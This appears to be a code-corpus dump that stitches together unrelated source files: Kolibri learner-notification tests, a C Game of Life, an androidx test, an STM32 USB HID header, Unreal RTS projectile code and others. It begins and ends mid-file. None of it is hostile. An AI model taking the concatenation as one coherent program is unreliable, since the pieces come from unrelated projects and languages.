user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
parse_attemptslog(attemptlog3)
assert save_notifications.called
create_notification.assert_called_once_with(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_assessment_with_three_wrong_attempts_no_started(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
start_lesson_assessment(attemptlog3, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_update_attempt_with_three_wrong_attempts_no_started(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
parse_attemptslog(attemptlog3)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
class BulkNotificationsAPITestCase(APITestCase):
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = FacilityFactory.create()
cls.superuser = create_superuser(cls.facility)
cls.user1 = FacilityUserFactory.create(facility=cls.facility)
cls.user2 = FacilityUserFactory.create(facility=cls.facility)
# create classroom, learner group, add user1
cls.classroom = ClassroomFactory.create(parent=cls.facility)
cls.classroom.add_member(cls.user1)
cls.channel_id = "15f32edcec565396a1840c5413c92450"
cls.lesson_id = "15f32edcec565396a1840c5413c92452"
cls.content_ids = [
"15f32edcec565396a1840c5413c92451",
"15f32edcec565396a1840c5413c92452",
"15f32edcec565396a1840c5413c92453",
]
cls.contentnode_ids = [
"25f32edcec565396a1840c5413c92451",
"25f32edcec565396a1840c5413c92452",
"25f32edcec565396a1840c5413c92453",
]
cls.node_1 = ContentNode.objects.create(
title="Node 1",
available=True,
id=cls.contentnode_ids[0],
content_id=cls.content_ids[0],
channel_id=cls.channel_id,
kind=content_kinds.EXERCISE,
)
cls.node_2 = ContentNode.objects.create(
title="Node 2",
available=True,
id=cls.contentnode_ids[1],
content_id=cls.content_ids[1],
channel_id=cls.channel_id,
kind=content_kinds.EXERCISE,
)
cls.lesson = Lesson.objects.create(
id=cls.lesson_id,
title="My Lesson",
is_active=True,
created_by=cls.superuser,
collection=cls.classroom,
resources=json.dumps(
[
{
"contentnode_id": cls.node_1.id,
"content_id": cls.node_1.content_id,
"channel_id": cls.channel_id,
},
{
"contentnode_id": cls.node_2.id,
"content_id": cls.node_2.content_id,
"channel_id": cls.channel_id,
},
]
),
)
cls.lesson_assignment = LessonAssignment.objects.create(
lesson=cls.lesson, assigned_by=cls.superuser, collection=cls.classroom
)
cls.exam1 = Exam.objects.create(
title="title1",
question_count=1,
active=True,
collection=cls.classroom,
creator=cls.superuser,
)
cls.exam1_assignment = ExamAssignment.objects.create(
exam=cls.exam1, collection=cls.classroom, assigned_by=cls.superuser
)
cls.examlog1 = ExamLog.objects.create(
exam=cls.exam1,
user=cls.user1,
closed=True,
completion_timestamp=local_now(),
)
cls.examattemptlog1 = ExamAttemptLog.objects.create(
examlog=cls.examlog1,
user=cls.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
complete=False,
correct=0.0,
content_id=uuid.uuid4(),
)
cls.exam2 = Exam.objects.create(
title="title2",
question_count=1,
active=True,
collection=cls.classroom,
creator=cls.superuser,
)
cls.exam2_assignment = ExamAssignment.objects.create(
exam=cls.exam2, collection=cls.classroom, assigned_by=cls.superuser
)
cls.examlog2 = ExamLog.objects.create(
exam=cls.exam2,
user=cls.user1,
closed=False,
)
cls.summarylog1 = ContentSummaryLogFactory.create(
user=cls.user1,
content_id=cls.node_1.content_id,
channel_id=cls.channel_id,
)
cls.summarylog2 = ContentSummaryLogFactory.create(
user=cls.user1,
content_id=cls.node_2.content_id,
channel_id=cls.channel_id,
kind=content_kinds.EXERCISE,
)
cls.sessionlog = ContentSessionLogFactory(
user=cls.user1,
content_id=cls.summarylog1.content_id,
channel_id=cls.summarylog1.channel_id,
)
cls.mlog = masterylog = MasteryLog.objects.create(
summarylog=cls.summarylog1,
user=cls.user1,
start_timestamp=local_now(),
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
cls.attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=cls.sessionlog,
user=cls.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
cls.attemptlog2 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=cls.sessionlog,
user=cls.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
def _assert_call_contains(self, call, *args, **kwargs):
# Check args that are [1] in the call
for actual, expected in zip(call[1], args):
self.assertEqual(actual, expected)
# Check kwargs that are [2] in the call
for key, actual in call[2].items():
if key in kwargs:
expected = kwargs[key]
self.assertEqual(actual, expected)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_summarylog_notifications(
self, save_notifications, create_notification
):
LearnerProgressNotification.objects.all().delete()
batch_process_summarylogs([self.summarylog1.id, self.summarylog2.id])
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=self.summarylog1.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_2.id,
timestamp=self.summarylog2.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Lesson,
NotificationEventType.Started,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
timestamp=self.summarylog1.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_examlog_notifications(self, save_notifications, create_notification):
LearnerProgressNotification.objects.all().delete()
batch_process_examlogs(
[self.examlog1.id, self.examlog2.id], [self.examattemptlog1.id]
)
assert save_notifications.called
self._assert_call_contains(
create_notification.mock_calls[0],
NotificationObjectType.Quiz,
NotificationEventType.Started,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[1],
NotificationObjectType.Quiz,
NotificationEventType.Answered,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[2],
NotificationObjectType.Quiz,
NotificationEventType.Completed,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examlog1.completion_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_attemptlog_notifications(
self, save_notifications, create_notification
):
LearnerProgressNotification.objects.all().delete()
batch_process_attemptlogs([self.attemptlog1.id, self.attemptlog2.id])
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=self.attemptlog1.end_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
self.attemptlog2.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=self.attemptlog2.end_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_attemptlog_needs_help(self, save_notifications, create_notification):
LearnerProgressNotification.objects.all().delete()
# more than 3 attempts will trigger the help notification
interactions = [{"type": "answer", "correct": 0}] * 3
attemptlog3 = AttemptLog.objects.create(
masterylog=self.mlog,
sessionlog=self.sessionlog,
user=self.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
batch_process_attemptlogs(
[self.attemptlog1.id, self.attemptlog2.id, attemptlog3.id]
)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.end_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.end_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_masterylog_from_examlog_notifications(
self, save_notifications, create_notification
):
LearnerProgressNotification.objects.all().delete()
migrate_from_exam_logs(ExamLog.objects.all())
batch_process_masterylogs_for_quizzes(
MasteryLog.objects.filter(summarylog__content_id=self.exam1.id)
.values_list("id", flat=True)
.order_by("complete"),
AttemptLog.objects.all().values_list("id", flat=True),
)
assert save_notifications.called
self._assert_call_contains(
create_notification.mock_calls[0],
NotificationObjectType.Quiz,
NotificationEventType.Answered,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[1],
NotificationObjectType.Quiz,
NotificationEventType.Started,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[2],
NotificationObjectType.Quiz,
NotificationEventType.Completed,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examlog1.completion_timestamp,
)
| 27,497 |
9,724 |
<gh_stars>1000+
// From http://rosettacode.org/wiki/Conway%27s_Game_of_Life#C
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define for_x for (int x = 0; x < w; x++)
#define for_y for (int y = 0; y < h; y++)
#define for_xy for_x for_y
void show(void *u, int w, int h)
{
int (*univ)[w] = u;
for_x printf("-"); printf("\n");
for_y {
for_x printf(univ[y][x] ? "[]" : " ");
printf("\n");
}
for_x printf("-"); printf("\n");
fflush(stdout);
}
void evolve(void *u, int w, int h)
{
unsigned (*univ)[w] = u;
unsigned new[h][w];
for_y for_x {
int n = 0;
for (int y1 = y - 1; y1 <= y + 1; y1++)
for (int x1 = x - 1; x1 <= x + 1; x1++)
if (univ[(y1 + h) % h][(x1 + w) % w])
n++;
if (univ[y][x]) n--;
new[y][x] = (n == 3 || (n == 2 && univ[y][x]));
}
for_y for_x univ[y][x] = new[y][x];
}
void nudge(void *u, int w, int h)
{
unsigned (*univ)[w] = u;
int sum = 0;
for_xy sum += univ[y][x];
while (sum < (w*h)/8) {
int x = sum & (w-1);
int y = (sum*sum) & (h-1);
univ[y][x] = 1;
sum++;
}
}
void game(int w, int h, int i)
{
unsigned univ[h][w];
//for_xy univ[y][x] = rand() < RAND_MAX / 10 ? 1 : 0;
int acc = 0; // nonrandom generation, for benchmarking
for_xy {
acc += (x*17) % (y*3 + 1);
univ[y][x] = acc & 1;
}
while (i != 0) {
//show(univ, w, h);
evolve(univ, w, h);
if (i > 0) {
i--;
nudge(univ, w, h); // keep it interesting for benchmark
} else {
#if !__EMSCRIPTEN__
usleep(20000);
#endif
show(univ, w, h);
}
}
show(univ, w, h);
}
int main(int argc, char **argv)
{
int w, h, i;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: w = h = 32; i = 2500; break;
case 2: w = h = 32; i = 13000; break;
case 3: w = h = 32; i = 24000; break;
case 4: w = h = 32; i = 5*24000; break;
case 5: w = h = 32; i = 10*24000; break;
default: printf("error: %d\\n", arg); return -1;
}
printf("life: %d,%d,%d,%d\n", arg, w, h, i);
game(w, h, i);
return 0;
}
| 1,072 |
3,799 |
<reponame>semoro/androidx
/*
* Copyright 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package androidx.appsearch.cts.app;
import static com.google.common.truth.Truth.assertThat;
import androidx.appsearch.app.ReportSystemUsageRequest;
import org.junit.Test;
public class ReportSystemUsageRequestCtsTest {
@Test
public void testGettersAndSetters() {
ReportSystemUsageRequest request = new ReportSystemUsageRequest.Builder(
"package1", "database1", "namespace1", "id1")
.setUsageTimestampMillis(32)
.build();
assertThat(request.getPackageName()).isEqualTo("package1");
assertThat(request.getDatabaseName()).isEqualTo("database1");
assertThat(request.getNamespace()).isEqualTo("namespace1");
assertThat(request.getDocumentId()).isEqualTo("id1");
assertThat(request.getUsageTimestampMillis()).isEqualTo(32);
}
@Test
public void testUsageTimestampDefault() {
long startTs = System.currentTimeMillis();
ReportSystemUsageRequest request =
new ReportSystemUsageRequest.Builder("package1", "database1", "namespace1", "id1")
.build();
assertThat(request.getUsageTimestampMillis()).isAtLeast(startTs);
}
}
| 650 |
307 |
/**
******************************************************************************
* @file usbd_hid.h
* @author MCD Application Team
* @brief Header file for the usbd_hid_core.c file.
******************************************************************************
* @attention
*
* <h2><center>© Copyright (c) 2015 STMicroelectronics.
* All rights reserved.</center></h2>
*
* This software component is licensed by ST under Ultimate Liberty license
* SLA0044, the "License"; You may not use this file except in compliance with
* the License. You may obtain a copy of the License at:
* www.st.com/SLA0044
*
******************************************************************************
*/
/* Define to prevent recursive inclusion -------------------------------------*/
#ifndef __USB_HID_H
#define __USB_HID_H
#ifdef __cplusplus
extern "C" {
#endif
/* Includes ------------------------------------------------------------------*/
#include "usbd_ioreq.h"
/** @addtogroup STM32_USB_DEVICE_LIBRARY
* @{
*/
/** @defgroup USBD_HID
* @brief This file is the Header file for usbd_hid.c
* @{
*/
/** @defgroup USBD_HID_Exported_Defines
* @{
*/
#define HID_EPIN_ADDR 0x81U
#define HID_EPIN_SIZE 0x04U
#define USB_HID_CONFIG_DESC_SIZ 34U
#define USB_HID_DESC_SIZ 9U
#define HID_MOUSE_REPORT_DESC_SIZE 74U
#define HID_DESCRIPTOR_TYPE 0x21U
#define HID_REPORT_DESC 0x22U
#ifndef HID_HS_BINTERVAL
#define HID_HS_BINTERVAL 0x07U
#endif /* HID_HS_BINTERVAL */
#ifndef HID_FS_BINTERVAL
#define HID_FS_BINTERVAL 0x0AU
#endif /* HID_FS_BINTERVAL */
#define HID_REQ_SET_PROTOCOL 0x0BU
#define HID_REQ_GET_PROTOCOL 0x03U
#define HID_REQ_SET_IDLE 0x0AU
#define HID_REQ_GET_IDLE 0x02U
#define HID_REQ_SET_REPORT 0x09U
#define HID_REQ_GET_REPORT 0x01U
/**
* @}
*/
/** @defgroup USBD_CORE_Exported_TypesDefinitions
* @{
*/
typedef enum
{
HID_IDLE = 0,
HID_BUSY,
}
HID_StateTypeDef;
typedef struct
{
uint32_t Protocol;
uint32_t IdleState;
uint32_t AltSetting;
HID_StateTypeDef state;
}
USBD_HID_HandleTypeDef;
/**
* @}
*/
/** @defgroup USBD_CORE_Exported_Macros
* @{
*/
/**
* @}
*/
/** @defgroup USBD_CORE_Exported_Variables
* @{
*/
extern USBD_ClassTypeDef USBD_HID;
#define USBD_HID_CLASS &USBD_HID
/**
* @}
*/
/** @defgroup USB_CORE_Exported_Functions
* @{
*/
uint8_t USBD_HID_SendReport(USBD_HandleTypeDef *pdev,
uint8_t *report,
uint16_t len);
uint32_t USBD_HID_GetPollingInterval(USBD_HandleTypeDef *pdev);
/**
* @}
*/
#ifdef __cplusplus
}
#endif
#endif /* __USB_HID_H */
/**
* @}
*/
/**
* @}
*/
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
| 1,502 |
4,339 |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.ignite.lang;
import java.io.Serializable;
/**
* Grid-aware adapter for {@link Runnable} implementations. It adds {@link Serializable} interface
* to {@link Runnable} object. Use this class for executing distributed computations on the grid,
* like in {@link org.apache.ignite.IgniteCompute#run(IgniteRunnable)} method.
*/
public interface IgniteRunnable extends Runnable, Serializable {
// No-op.
}
| 325 |
14,668 |
<reponame>zealoussnow/chromium<gh_stars>1000+
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "components/autofill/core/browser/test_autofill_profile_validator.h"
#include <memory>
#include "base/base_paths.h"
#include "base/bind.h"
#include "base/files/file_path.h"
#include "base/path_service.h"
#include "third_party/libaddressinput/src/cpp/include/libaddressinput/null_storage.h"
#include "third_party/libaddressinput/src/cpp/test/testdata_source.h"
namespace {
using ::i18n::addressinput::Source;
using ::i18n::addressinput::Storage;
using ::i18n::addressinput::NullStorage;
using ::i18n::addressinput::TestdataSource;
} // namespace
namespace autofill {
namespace {
std::unique_ptr<::i18n::addressinput::Source> GetInputSource() {
base::FilePath file_path;
CHECK(base::PathService::Get(base::DIR_SOURCE_ROOT, &file_path));
file_path = file_path.Append(FILE_PATH_LITERAL("third_party"))
.Append(FILE_PATH_LITERAL("libaddressinput"))
.Append(FILE_PATH_LITERAL("src"))
.Append(FILE_PATH_LITERAL("testdata"))
.Append(FILE_PATH_LITERAL("countryinfo.txt"));
return std::make_unique<TestdataSource>(true, file_path.AsUTF8Unsafe());
}
std::unique_ptr<::i18n::addressinput::Storage> GetInputStorage() {
return std::unique_ptr<Storage>(new NullStorage);
}
} // namespace
// static
AutofillProfileValidator* TestAutofillProfileValidator::GetInstance() {
static base::LazyInstance<TestAutofillProfileValidator>::DestructorAtExit
instance = LAZY_INSTANCE_INITIALIZER;
return &(instance.Get().autofill_profile_validator_);
}
// static
TestAutofillProfileValidatorDelayed*
TestAutofillProfileValidator::GetDelayedInstance() {
static base::LazyInstance<TestAutofillProfileValidator>::DestructorAtExit
instance = LAZY_INSTANCE_INITIALIZER;
return &(instance.Get().autofill_profile_validator_delayed_);
}
TestAutofillProfileValidator::TestAutofillProfileValidator()
: autofill_profile_validator_(GetInputSource(), GetInputStorage()),
autofill_profile_validator_delayed_(GetInputSource(), GetInputStorage()) {
}
TestAutofillProfileValidator::~TestAutofillProfileValidator() {}
} // namespace autofill
| 853 |
397 |
package com.zrlog.business.service;
public interface InstallAction {
/**
* 当安装流程正常执行完成时,调用了该方法,主要用于配置,启动JFinal插件功能,以及相应的Zrlog的插件服务。
*/
void installFinish();
}
| 147 |
4,054 |
// Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
#pragma once
#include "named_service.h"
#include "monitor.h"
#include <vespa/fnet/frt/invoker.h>
namespace slobrok {
//-----------------------------------------------------------------------------
class IRpcServerManager;
/**
* @class ManagedRpcServer
* @brief A NamedService that is managed by this location broker
*
* This class contains the logic to monitor the connection to a
* NamedService and also to do a healthCheck using the RPC method
* slobrok.checkRpcServer on the connection, notifying its
* manager using callbacks in the IRpcServerManager interface.
**/
class ManagedRpcServer: public NamedService,
public FRT_IRequestWait,
public FNET_Task,
public IMonitoredServer
{
public:
ManagedRpcServer(const ManagedRpcServer&) = delete;
ManagedRpcServer& operator=(const ManagedRpcServer&) = delete;
ManagedRpcServer(const std::string & name, const std::string & spec, IRpcServerManager &manager);
~ManagedRpcServer();
void healthCheck();
void PerformTask() override;
private:
IRpcServerManager &_mmanager;
Monitor _monitor;
FRT_Target *_monitoredServer;
FRT_RPCRequest *_checkServerReq;
void cleanupMonitor();
bool validateRpcServer(uint32_t numstrings,
FRT_StringValue *strings);
public:
void RequestDone(FRT_RPCRequest *req) override;
void notifyDisconnected() override; // lost connection to service
};
//-----------------------------------------------------------------------------
} // namespace slobrok
| 600 |
577 |
class foo:
def bar():
return 'bar'
try:
foo.bar()
except TypeError:
pass
else:
print 'unbound method must be called with class instance 1st argument'
| 67 |
5,133 |
<gh_stars>1000+
/*
* Copyright MapStruct Authors.
*
* Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0
*/
package org.mapstruct.ap.test.nestedsource.parameter;
import org.mapstruct.InheritInverseConfiguration;
import org.mapstruct.Mapper;
import org.mapstruct.Mapping;
import org.mapstruct.Mappings;
import org.mapstruct.factory.Mappers;
/**
*
* @author <NAME>
*/
@Mapper
public interface LetterMapper {
LetterMapper INSTANCE = Mappers.getMapper( LetterMapper.class );
@Mappings( {
@Mapping( target = "fontType", source = "font.type"),
@Mapping( target = "fontSize", source = "font.size"),
@Mapping( target = "letterHeading", source = "heading"),
@Mapping( target = "letterBody", source = "body"),
@Mapping( target = "letterSignature", source = "dto.signature")
} )
LetterEntity normalize(LetterDto dto);
@InheritInverseConfiguration
@Mapping(target = "font", source = "entity")
LetterDto deNormalizeLetter(LetterEntity entity);
@Mappings( {
@Mapping( target = "type", source = "fontType"),
@Mapping( target = "size", source = "fontSize")
} )
FontDto deNormalizeFont(LetterEntity entity);
}
| 458 |
617 |
<filename>Source/RTSProject/Plugins/RealTimeStrategy/Source/RealTimeStrategy/Classes/Combat/RTSProjectile.h
#pragma once
#include "CoreMinimal.h"
#include "GameFramework/Actor.h"
#include "Templates/SubclassOf.h"
#include "RTSProjectile.generated.h"
class UProjectileMovementComponent;
class USoundCue;
/**
* Projectile with RTS features, such as following a target and dealing damage.
*/
UCLASS()
class REALTIMESTRATEGY_API ARTSProjectile : public AActor
{
GENERATED_BODY()
public:
ARTSProjectile(const FObjectInitializer& ObjectInitializer = FObjectInitializer::Get());
/** Locks on to the specified target, dealing damage on impact. */
UFUNCTION(BlueprintCallable)
void FireAt(
AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileInstigator,
AActor* ProjectileDamageCauser);
virtual void Tick(float DeltaSeconds) override;
/** Event when this projectile hits its target. */
virtual void NotifyOnProjectileDetonated(
AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileInstigator,
AActor* ProjectileDamageCauser);
/** Event when this projectile hits its target. */
UFUNCTION(BlueprintImplementableEvent, Category = "RTS", meta = (DisplayName = "OnProjectileDetonated"))
void ReceiveOnProjectileDetonated(
AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileInstigator,
AActor* ProjectileDamageCauser);
private:
/** Whether the projectile should follow a ballistic trajectory on its way. Should not be used with homing projectiles. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
bool bBallisticTrajectory;
/** How much to exaggerate the ballistic trajectory. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bBallisticTrajectory))
float BallisticTrajectoryFactor;
/** Whether this projectile causes an area of effect when hitting its target location. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
bool bApplyAreaOfEffect;
/** Radius around impact location in which targets take damage. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bApplyAreaOfEffect, ClampMin = 0))
float AreaOfEffect;
/** Object types to query when finding area of effect targets near the impact location. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bApplyAreaOfEffect))
TArray<TEnumAsByte<EObjectTypeQuery>> AreaOfEffectTargetObjectTypeFilter;
/** Actor class to filter by when finding area of effect targets near the impact location. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bApplyAreaOfEffect))
TSubclassOf<AActor> AreaOfEffectTargetClassFilter;
/** Sound to play when the projectile is fired. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
USoundCue* FiredSound;
/** Sound to play on projectile impact. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
USoundCue* ImpactSound;
bool bFired;
UPROPERTY()
AActor* Target;
FVector TargetLocation;
float Damage;
TSubclassOf<class UDamageType> DamageType;
UPROPERTY()
AController* EventInstigator;
UPROPERTY()
AActor* DamageCauser;
float TimeToImpact;
/** How far away the projectile started flying towards its target. */
float InitialDistance;
/** How far above the ground the projectile started flying towards its target. */
float InitialHeight;
/** How far above the ground the target was when the projectile started flying towards it. */
float TargetHeight;
/** Angle at which the projectile has been launched if following a ballistic trajectory. */
float LaunchAngle;
UPROPERTY(VisibleAnywhere, Category = "RTS")
UProjectileMovementComponent* ProjectileMovement;
UFUNCTION(NetMulticast, Reliable)
void MulticastFireAt(AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileEventInstigator,
AActor* ProjectileDamageCauser);
void HitTargetActor(AActor* Actor);
void HitTargetLocation();
};
| 1,384 |
2,103 |
import base64
import pytest
from h.models.auth_client import GrantType
@pytest.fixture
def authority():
return "example.com"
@pytest.fixture
def user(_user_for_authority, authority):
return _user_for_authority(authority)
@pytest.fixture
def auth_header(auth_header_for_authority, authority):
return auth_header_for_authority(authority)
@pytest.fixture
def auth_header_for_authority(db_session, factories):
def _make_headers(authority):
auth_client = factories.ConfidentialAuthClient(
authority=authority, grant_type=GrantType.client_credentials
)
db_session.commit()
user_pass = f"{auth_<PASSWORD>}:{auth_client.<PASSWORD>}".encode("utf-8")
